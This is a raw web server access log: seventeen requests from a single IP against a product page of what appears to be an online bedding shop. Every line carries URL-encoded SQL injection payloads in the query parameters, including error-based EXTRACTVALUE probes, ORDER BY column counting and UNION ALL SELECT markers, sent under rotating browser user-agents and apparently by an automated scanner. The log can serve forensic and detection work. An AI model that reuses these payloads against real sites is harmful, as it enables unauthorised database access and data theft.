92.142.152.98 - - [20/Aug/2026:05:58:49 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%25%27%20AND%20EXTRACTVALUE%282314%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%282314%3D2314%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 200 199999 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
92.142.152.98 - - [20/Aug/2026:05:58:49 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%27%20ORDER%20BY%201000--%20- HTTP/1.1" 200 198407 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:49 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%20ORDER%20BY%201--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:49 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%20AND%20EXTRACTVALUE%282449%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%282449%3D2449%2C1%29%29%29%29%2C0x7e%29%29--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
92.142.152.98 - - [20/Aug/2026:05:58:50 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%22%20AND%20EXTRACTVALUE%287126%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%287126%3D7126%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 200 200125 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
92.142.152.98 - - [20/Aug/2026:05:58:50 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%20UNION%20ALL%20SELECT%20%27sxffalfufsuasvstkpkgwkftylkthulb%27--%20yai051 HTTP/1.1" 200 199111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:51 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%20ORDER%20BY%201--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
92.142.152.98 - - [20/Aug/2026:05:58:51 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%20AND%20EXTRACTVALUE%282449%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%282449%3D2449%2C1%29%29%29%29%2C0x7e%29%29--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
92.142.152.98 - - [20/Aug/2026:05:58:51 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%25%22%20AND%20EXTRACTVALUE%286762%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%286762%3D6762%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 200 200316 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:52 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=-1%20UNION%20ALL%20SELECT%20%27sxffalfufsuasvstkpkgwkftylkthulb%27--%20yai051 HTTP/1.1" 200 209939 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:52 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%20ORDER%20BY%201--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
92.142.152.98 - - [20/Aug/2026:05:58:52 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%20AND%20EXTRACTVALUE%282449%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%282449%3D2449%2C1%29%29%29%29%2C0x7e%29%29--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
92.142.152.98 - - [20/Aug/2026:05:58:53 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%60%20AND%20EXTRACTVALUE%285535%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%285535%3D5535%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 200 200382 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
92.142.152.98 - - [20/Aug/2026:05:58:53 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%27%20UNION%20ALL%20SELECT%20%27sxffalfufsuasvstkpkgwkftylkthulb%27--%20yai051 HTTP/1.1" 200 199787 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
92.142.152.98 - - [20/Aug/2026:05:58:53 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%27%20UNION%20ALL%20SELECT%20%27libsdfplwbfsazvqkhtrtdunnkvjvdzy%27--%20n7pcpu&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
92.142.152.98 - - [20/Aug/2026:05:58:54 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet%27%20AND%20EXTRACTVALUE%286292%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%286292%3D6292%2C1%29%29%29%29%2C0x7e%29%29--%20-&histo_track=1 HTTP/1.1" 500 6 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
92.142.152.98 - - [20/Aug/2026:05:58:54 +0200] "GET /product.php?seo=102-ref-30-acc-haut-en-90x200-complet&histo_track=1%29%20AND%20EXTRACTVALUE%289043%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%289043%3D9043%2C1%29%29%29%29%2C0x7e%29%29--%20- HTTP/1.1" 200 199987 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
